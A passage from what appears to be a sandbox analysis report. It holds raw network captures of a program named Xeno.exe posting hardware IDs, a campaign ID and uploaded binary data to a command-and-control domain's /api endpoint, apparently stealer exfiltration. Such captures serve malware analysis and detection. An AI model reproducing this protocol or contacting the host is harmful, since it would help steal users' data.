                          Jan 15, 2025 16:16:07.640410900 CET1.1.1.1192.168.2.40x89f4No error (0)sobrattyeu.bond104.21.32.1A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • sobrattyeu.bond

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449731104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:08 UTC262OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                          Data Ascii: act=life
                          2025-01-15 15:16:08 UTC1125INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=4k1fn448hi356mkp89f05q5jtb; expires=Sun, 11 May 2025 09:02:47 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BALVQZt1voE34jIPldZhA7YVo%2FPAVmy3i801oHrUNiHInMhZZZ1irPvAe8TlXOj%2B5Lw54fVoXNbGuLBJ9yxrdGLIIofq0R6YIC3eRmEqcYaUNQsdIsKu%2B06EvPOuXQ4CzU%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d340193a42c0-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1708&rtt_var=644&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1695702&cwnd=212&unsent_bytes=0&cid=da12fd3111880800&ts=551&x=0"
                          2025-01-15 15:16:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                          Data Ascii: 2ok
                          2025-01-15 15:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449733104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:09 UTC263OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 51
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:09 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d
                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--914510980&j=
                          2025-01-15 15:16:10 UTC1127INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=0g8a7o6jujrdd64bfsiqn8ba5o; expires=Sun, 11 May 2025 09:02:49 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OOJAvguJDZtvc1w0OnD%2F2bP5QXmqH82SwOtTDga%2FX%2BhAlKFCatLORRuNqI9iuH4%2FZiyEdAu6GVSyhk5o5YtxfFCnEahW%2BN9TBwKdUQjpSi5rlzc2KmOrLrb1MY6xDz85OM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3499eaa72a4-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1964&rtt_var=752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1439842&cwnd=212&unsent_bytes=0&cid=e323a9ece74c9fa8&ts=512&x=0"
                          2025-01-15 15:16:10 UTC242INData Raw: 63 34 39 0d 0a 35 2b 35 53 71 7a 65 4c 31 77 71 33 43 39 51 4a 68 2b 78 37 43 78 70 34 69 47 74 4c 54 41 2b 45 56 62 6a 4d 77 6a 49 38 72 48 47 63 7a 43 53 4a 44 62 2f 37 4b 4d 52 75 39 6a 50 7a 6e 67 35 75 4e 6c 72 70 44 32 6c 32 61 65 55 35 79 36 6e 75 45 45 72 42 55 39 32 49 4d 38 64 45 37 76 73 6f 30 6e 50 32 4d 39 79 58 57 57 35 30 57 72 4a 4a 4c 69 5a 74 35 54 6e 61 72 61 6c 64 54 4d 41 53 6a 34 49 31 77 31 4c 6f 73 32 76 62 5a 72 46 73 34 6f 30 52 5a 58 4d 56 34 41 5a 70 59 43 33 68 4c 35 72 32 34 48 39 5a 32 42 43 71 6a 79 48 41 46 66 62 37 63 5a 56 75 75 69 75 39 7a 68 70 75 65 42 54 75 44 79 41 6b 5a 2b 77 78 32 36 69 6f 51 6c 58 4b 47 59 2b 4d 4e 73 4a 59 34 61 64 6d 30 57 47 36 61 75 69 4e 57 53 63 34 48
                          Data Ascii: c495+5SqzeL1wq3C9QJh+x7Cxp4iGtLTA+EVbjMwjI8rHGczCSJDb/7KMRu9jPzng5uNlrpD2l2aeU5y6nuEErBU92IM8dE7vso0nP2M9yXWW50WrJJLiZt5TnaraldTMASj4I1w1Los2vbZrFs4o0RZXMV4AZpYC3hL5r24H9Z2BCqjyHAFfb7cZVuuiu9zhpueBTuDyAkZ+wx26ioQlXKGY+MNsJY4adm0WG6auiNWSc4H
                          2025-01-15 15:16:10 UTC1369INData Raw: 66 4a 4a 63 57 34 2b 31 44 54 4c 76 37 56 64 54 73 68 54 6d 73 49 70 69 56 4c 6c 39 54 43 56 59 62 70 6c 34 49 30 57 62 6e 6b 61 2b 41 59 70 4c 57 58 75 4d 39 43 68 72 31 39 51 78 42 53 4e 68 54 66 47 55 75 47 7a 5a 39 59 70 2b 43 76 69 6c 6c 6b 78 4f 44 72 36 43 69 6f 36 59 50 64 33 78 65 43 35 45 46 6e 43 55 39 33 4d 4e 73 64 55 35 4c 56 36 33 57 4b 39 62 76 65 46 45 47 52 31 47 75 63 44 4a 69 31 74 34 54 33 51 6f 61 70 55 55 38 4d 56 68 59 78 77 68 78 58 75 72 53 69 4e 4b 5a 56 75 39 59 6b 56 66 7a 6f 67 71 68 5a 6e 4e 79 33 68 4f 35 72 32 34 46 68 62 7a 52 43 4f 67 7a 50 42 58 76 75 31 65 74 4e 6b 73 33 6e 6a 69 78 64 6a 65 77 6a 67 42 79 38 74 5a 4f 30 2b 33 36 6d 6b 45 42 43 4f 46 4a 33 4d 61 49 6c 30 35 4c 35 6b 33 33 36 32 4b 2f 72 41 41 43 6c 2f
                          Data Ascii: fJJcW4+1DTLv7VdTshTmsIpiVLl9TCVYbpl4I0Wbnka+AYpLWXuM9Chr19QxBSNhTfGUuGzZ9Yp+CvillkxODr6Cio6YPd3xeC5EFnCU93MNsdU5LV63WK9bveFEGR1GucDJi1t4T3QoapUU8MVhYxwhxXurSiNKZVu9YkVfzogqhZnNy3hO5r24FhbzRCOgzPBXvu1etNks3njixdjewjgBy8tZO0+36mkEBCOFJ3MaIl05L5k3362K/rAACl/
                          2025-01-15 15:16:10 UTC1369INData Raw: 38 68 59 4f 70 33 6c 4f 36 6e 53 42 36 57 55 36 2b 50 4a 4d 70 66 71 34 42 72 32 32 65 78 66 61 57 52 56 33 41 34 48 65 5a 4a 63 57 35 67 35 7a 2f 63 76 4b 39 64 58 63 41 64 69 6f 6b 2f 77 56 58 70 75 47 33 52 59 72 31 6f 36 49 6f 4c 59 33 67 53 37 77 67 6a 4a 43 32 6f 64 39 32 32 34 41 67 65 2f 77 53 4f 7a 67 58 4b 57 2b 65 79 66 70 56 32 2b 48 4b 6c 69 52 55 70 49 46 72 6e 41 53 77 72 59 75 63 39 31 4b 75 71 58 46 62 41 45 4a 65 44 4e 4d 6c 5a 34 62 39 6c 32 32 32 2b 59 75 36 46 48 32 6c 35 45 4b 70 48 61 53 6c 31 70 6d 2b 61 6d 71 64 63 55 38 46 52 73 49 38 2b 78 31 4c 2f 39 58 65 62 63 50 5a 73 36 63 35 42 4b 58 51 54 36 67 49 6a 4b 6d 33 68 4f 74 2b 74 70 31 4e 54 79 52 6d 4c 69 7a 54 46 58 4f 53 7a 61 4e 4a 74 73 33 6e 67 68 78 56 6c 4f 46 53 71 44
                          Data Ascii: 8hYOp3lO6nSB6WU6+PJMpfq4Br22exfaWRV3A4HeZJcW5g5z/cvK9dXcAdiok/wVXpuG3RYr1o6IoLY3gS7wgjJC2od9224Age/wSOzgXKW+eyfpV2+HKliRUpIFrnASwrYuc91KuqXFbAEJeDNMlZ4b9l222+Yu6FH2l5EKpHaSl1pm+amqdcU8FRsI8+x1L/9XebcPZs6c5BKXQT6gIjKm3hOt+tp1NTyRmLizTFXOSzaNJts3nghxVlOFSqD
                          2025-01-15 15:16:10 UTC172INData Raw: 2f 64 39 32 69 34 41 67 65 78 78 71 58 67 6a 37 41 57 4f 2b 39 62 39 74 6b 76 57 33 75 69 52 35 76 64 52 4c 6e 44 43 6f 76 61 65 77 6c 32 61 57 71 58 56 53 4f 58 63 57 4c 4b 49 6b 4e 71 5a 4a 6b 2f 48 6d 74 65 66 50 4f 42 69 64 68 57 75 30 46 61 58 59 74 35 54 6a 54 6f 61 68 59 55 63 45 58 69 34 6f 32 78 46 44 6d 76 33 72 64 5a 37 74 67 36 6f 55 4c 61 58 55 65 35 67 30 68 4a 57 65 6d 65 5a 71 70 75 42 41 47 6a 69 61 49 67 7a 44 4b 51 36 6d 71 4a 73 77 70 73 57 65 6c 31 6c 6c 6c 64 68 72 6c 42 53 55 6c 5a 0d 0a
                          Data Ascii: /d92i4AgexxqXgj7AWO+9b9tkvW3uiR5vdRLnDCovaewl2aWqXVSOXcWLKIkNqZJk/HmtefPOBidhWu0FaXYt5TjToahYUcEXi4o2xFDmv3rdZ7tg6oULaXUe5g0hJWemeZqpuBAGjiaIgzDKQ6mqJswpsWel1llldhrlBSUlZ
                          2025-01-15 15:16:10 UTC1369INData Raw: 33 64 34 62 0d 0a 65 63 37 31 4b 6d 6c 57 56 62 47 41 59 53 49 4f 4d 68 62 35 72 52 73 30 47 79 79 62 4f 47 49 46 69 6b 32 57 75 30 52 61 58 59 74 79 52 44 76 37 49 46 71 48 74 46 64 6e 4d 77 33 78 52 57 78 39 57 54 57 5a 62 35 6b 34 34 63 56 59 33 45 52 35 67 49 74 49 6d 54 6a 4d 64 75 72 70 56 46 61 77 68 6d 44 6a 7a 50 47 57 75 61 39 4b 4a 73 70 73 58 4f 6c 31 6c 6c 4d 62 78 48 6b 44 32 6b 78 49 2f 39 33 33 61 4c 67 43 42 37 43 47 6f 4f 4b 4e 63 56 55 37 37 31 74 33 57 32 33 62 65 4f 4e 46 6d 31 39 47 2b 55 4e 4a 53 42 6e 35 7a 62 57 70 61 39 62 57 34 35 64 78 59 73 6f 69 51 32 70 68 47 76 44 66 71 5a 6e 70 5a 46 58 63 44 67 64 35 6b 6c 78 62 6d 7a 30 50 64 43 67 70 56 39 62 7a 52 79 43 67 54 62 46 58 2b 43 39 62 74 70 67 70 47 6a 70 67 42 35 6e 64 42
                          Data Ascii: 3d4bec71KmlWVbGAYSIOMhb5rRs0GyybOGIFik2Wu0RaXYtyRDv7IFqHtFdnMw3xRWx9WTWZb5k44cVY3ER5gItImTjMdurpVFawhmDjzPGWua9KJspsXOl1llMbxHkD2kxI/933aLgCB7CGoOKNcVU771t3W23beONFm19G+UNJSBn5zbWpa9bW45dxYsoiQ2phGvDfqZnpZFXcDgd5klxbmz0PdCgpV9bzRyCgTbFX+C9btpgpGjpgB5ndB
                          2025-01-15 15:16:10 UTC1369INData Raw: 4b 57 72 76 50 4d 69 6b 70 31 64 56 78 68 69 4b 69 69 4c 46 57 2f 75 77 65 73 63 70 2b 43 76 69 6c 6c 6b 78 4f 43 7a 74 47 54 6b 74 4c 39 63 68 32 62 69 72 58 56 4b 4f 44 4d 75 56 63 4d 35 5a 71 65 30 6f 30 32 61 2f 61 4f 71 50 45 47 56 31 48 2b 4d 4d 4b 43 68 70 37 44 33 61 71 4b 5a 52 57 38 51 51 68 49 59 35 7a 6c 33 75 74 6e 71 56 4a 2f 5a 73 2f 63 35 42 4b 56 45 64 2b 41 63 35 62 6e 4b 6f 4c 70 71 70 72 42 41 47 6a 68 65 50 67 7a 54 4f 57 65 2b 77 62 74 68 6f 75 57 72 6c 67 52 31 69 63 52 7a 72 42 43 77 6a 61 66 51 39 30 61 47 73 57 56 4c 44 55 38 76 4d 4e 39 45 56 73 66 56 5a 32 47 65 34 62 50 50 4f 42 69 64 68 57 75 30 46 61 58 59 74 35 7a 76 56 72 61 39 54 58 63 38 5a 6c 35 34 38 77 46 33 73 75 57 50 62 62 36 52 74 36 6f 63 61 61 6e 45 64 34 67 55
                          Data Ascii: KWrvPMikp1dVxhiKiiLFW/uwescp+CvillkxOCztGTktL9ch2birXVKODMuVcM5Zqe0o02a/aOqPEGV1H+MMKChp7D3aqKZRW8QQhIY5zl3utnqVJ/Zs/c5BKVEd+Ac5bnKoLpqprBAGjhePgzTOWe+wbthouWrlgR1icRzrBCwjafQ90aGsWVLDU8vMN9EVsfVZ2Ge4bPPOBidhWu0FaXYt5zvVra9TXc8Zl548wF3suWPbb6Rt6ocaanEd4gU
                          2025-01-15 15:16:10 UTC1369INData Raw: 53 61 61 39 72 5a 41 53 63 6b 4d 79 35 56 77 7a 6c 6d 70 37 53 6a 54 59 4c 42 73 34 34 41 4c 62 48 34 56 35 51 41 67 4b 6d 58 6c 4e 39 36 71 70 31 56 64 77 68 69 43 6a 7a 2f 4e 58 4f 65 38 5a 35 55 6e 39 6d 7a 39 7a 6b 45 70 57 51 48 70 42 53 52 75 63 71 67 75 6d 71 6d 73 45 41 61 4f 48 34 75 4a 4d 4d 4e 54 37 62 42 75 33 32 79 32 59 4f 61 42 48 57 39 38 46 65 6f 43 49 43 39 72 34 7a 33 52 71 4b 31 54 57 4d 68 54 79 38 77 33 30 52 57 78 39 55 6a 4f 5a 4c 70 73 70 5a 46 58 63 44 67 64 35 6b 6c 78 62 6d 62 71 4d 39 32 75 72 56 4e 57 79 78 65 50 69 54 44 42 52 2b 47 31 62 38 64 37 74 6d 4c 67 67 68 70 70 66 42 7a 6a 44 79 6f 71 4c 61 68 33 33 62 62 67 43 42 37 6a 48 34 4b 6c 4e 39 49 56 39 76 74 78 6c 57 36 36 4b 37 33 4f 47 47 4a 79 46 65 63 4b 4c 79 31 6d
                          Data Ascii: Saa9rZASckMy5Vwzlmp7SjTYLBs44ALbH4V5QAgKmXlN96qp1VdwhiCjz/NXOe8Z5Un9mz9zkEpWQHpBSRucqgumqmsEAaOH4uJMMNT7bBu32y2YOaBHW98FeoCIC9r4z3RqK1TWMhTy8w30RWx9UjOZLpspZFXcDgd5klxbmbqM92urVNWyxePiTDBR+G1b8d7tmLgghppfBzjDyoqLah33bbgCB7jH4KlN9IV9vtxlW66K73OGGJyFecKLy1m
                          2025-01-15 15:16:10 UTC1369INData Raw: 65 35 45 45 69 4f 53 39 66 43 63 4e 73 56 73 66 55 76 31 6e 75 6b 62 65 61 59 47 69 35 47 4a 4d 30 66 49 79 6c 39 34 53 44 56 37 75 34 51 55 59 35 4c 76 4d 77 35 7a 6b 37 34 6f 32 58 46 62 76 5a 55 71 38 34 42 4b 53 42 61 33 77 6f 6e 49 47 72 77 4a 70 65 4a 74 6c 70 5a 33 68 53 53 67 33 43 48 46 65 2f 31 4d 49 59 6e 39 6d 2f 30 7a 6b 45 35 4b 6b 47 2f 57 6e 35 2b 50 2f 6c 35 77 2b 36 32 45 41 61 63 58 63 57 65 63 4a 45 56 72 72 5a 36 78 32 2b 31 66 65 62 4a 4a 31 64 66 41 4f 63 50 50 6a 39 54 32 44 44 41 6f 36 5a 48 54 34 49 47 68 6f 49 2b 7a 6b 4f 70 2b 79 6a 61 4b 65 35 53 70 63 5a 5a 56 6a 5a 61 38 6b 6c 78 62 6c 6a 6c 4f 64 53 70 74 6b 45 54 36 51 6d 49 69 69 66 59 46 61 66 31 62 70 55 78 35 43 57 6c 69 67 67 70 49 45 71 34 55 6e 78 39 4f 72 5a 6c 78
                          Data Ascii: e5EEiOS9fCcNsVsfUv1nukbeaYGi5GJM0fIyl94SDV7u4QUY5LvMw5zk74o2XFbvZUq84BKSBa3wonIGrwJpeJtlpZ3hSSg3CHFe/1MIYn9m/0zkE5KkG/Wn5+P/l5w+62EAacXcWecJEVrrZ6x2+1febJJ1dfAOcPPj9T2DDAo6ZHT4IGhoI+zkOp+yjaKe5SpcZZVjZa8klxbljlOdSptkET6QmIiifYFaf1bpUx5CWliggpIEq4Unx9OrZlx
                          2025-01-15 15:16:10 UTC1369INData Raw: 65 68 6c 4f 36 77 6e 44 52 46 62 48 31 58 64 5a 6e 75 47 7a 7a 6e 31 52 42 57 79 44 51 53 77 55 70 65 4b 51 44 33 62 36 78 57 31 50 43 55 38 76 4d 4e 6f 6b 4e 75 66 73 6f 30 58 6a 32 4d 37 58 63 51 6a 77 72 54 62 70 62 4e 6d 42 30 70 69 47 61 39 76 49 65 48 74 78 54 33 63 78 33 79 6b 66 37 73 32 76 44 61 76 46 56 32 36 6b 58 62 6e 6b 4d 2b 68 34 6d 45 46 50 7a 4e 4e 53 67 70 30 5a 50 6a 6c 33 46 67 33 43 52 62 4b 6e 39 4b 4f 6f 6e 39 6e 4f 6c 31 6c 6c 63 65 78 54 6b 44 6a 38 2f 49 4d 45 35 33 61 2b 32 51 45 6e 42 55 38 76 4d 4e 6f 6b 4e 75 2f 73 6f 30 58 6a 32 4d 37 58 63 51 6a 77 72 54 62 70 62 4e 6d 42 30 70 69 47 61 39 76 49 65 48 74 78 54 33 63 78 33 79 6b 66 37 73 32 76 44 61 76 46 56 32 36 6b 58 62 6e 6b 4d 2b 68 34 6d 59 55 50 51 46 75 53 51 74 56
                          Data Ascii: ehlO6wnDRFbH1XdZnuGzzn1RBWyDQSwUpeKQD3b6xW1PCU8vMNokNufso0Xj2M7XcQjwrTbpbNmB0piGa9vIeHtxT3cx3ykf7s2vDavFV26kXbnkM+h4mEFPzNNSgp0ZPjl3Fg3CRbKn9KOon9nOl1llcexTkDj8/IME53a+2QEnBU8vMNokNu/so0Xj2M7XcQjwrTbpbNmB0piGa9vIeHtxT3cx3ykf7s2vDavFV26kXbnkM+h4mYUPQFuSQtV


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449737104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:11 UTC273OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=0C84Y36Y3O
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 18119
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:11 UTC15331OUTData Raw: 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 30 43 38 34 59 33 36 59 33 4f 0d 0a 43 6f 6e 74
                          Data Ascii: --0C84Y36Y3OContent-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--0C84Y36Y3OContent-Disposition: form-data; name="pid"2--0C84Y36Y3OContent-Disposition: form-data; name="lid"yau6Na--914510980--0C84Y36Y3OCont
                          2025-01-15 15:16:11 UTC2788OUTData Raw: 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c
                          Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                          2025-01-15 15:16:23 UTC1129INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=bkpv6kfohogae572fsvpc1vdi4; expires=Sun, 11 May 2025 09:03:01 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jw7cZeKriIiu4mIZ8o6weCN8vUL9l4suOuHx3H%2BdCKlrGRAwDWvauu%2B7ksR9pDlUjOfIGv86H8HipuPnGhfF0SOeL78t3eKj7bxhkn6nDIixWjEJ9%2FYbzTeZyodtvUQoxZ8%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3523ab5de9a-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1465&rtt_var=556&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19072&delivery_rate=1958417&cwnd=194&unsent_bytes=0&cid=656ed4bc6531c0d1&ts=12500&x=0"
                          2025-01-15 15:16:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:23 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449746104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:24 UTC280OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=XVKS6T05H4JF1683U6
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 8788
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:24 UTC8788OUTData Raw: 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 56 4b 53 36 54 30 35 48 34 4a 46 31 36 38 33 55 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31
                          Data Ascii: --XVKS6T05H4JF1683U6Content-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--XVKS6T05H4JF1683U6Content-Disposition: form-data; name="pid"2--XVKS6T05H4JF1683U6Content-Disposition: form-data; name="lid"yau6Na--91451
                          2025-01-15 15:16:24 UTC1123INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=f2jdn5ljeg5l8fgvs93t4e7dml; expires=Sun, 11 May 2025 09:03:03 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQLqghnl32Uac%2FhOkAX3MV5xLgJgpAcZX4SbpU0CQiDgQOBN5Lx6RHTBWLz4z4ryMKXWdVipp9u5pwYStRfShTGJm%2BnhtSqI4ABNGWle4OGZloSXSeA9hfAzUxbURCa5UtU%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3a3583ac32e-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1532&min_rtt=1511&rtt_var=610&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9726&delivery_rate=1732937&cwnd=178&unsent_bytes=0&cid=25fa0087d3385d00&ts=827&x=0"
                          2025-01-15 15:16:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449747104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:25 UTC273OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=WLMONHV8TN
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 20393
                          Host: sobrattyeu.bond
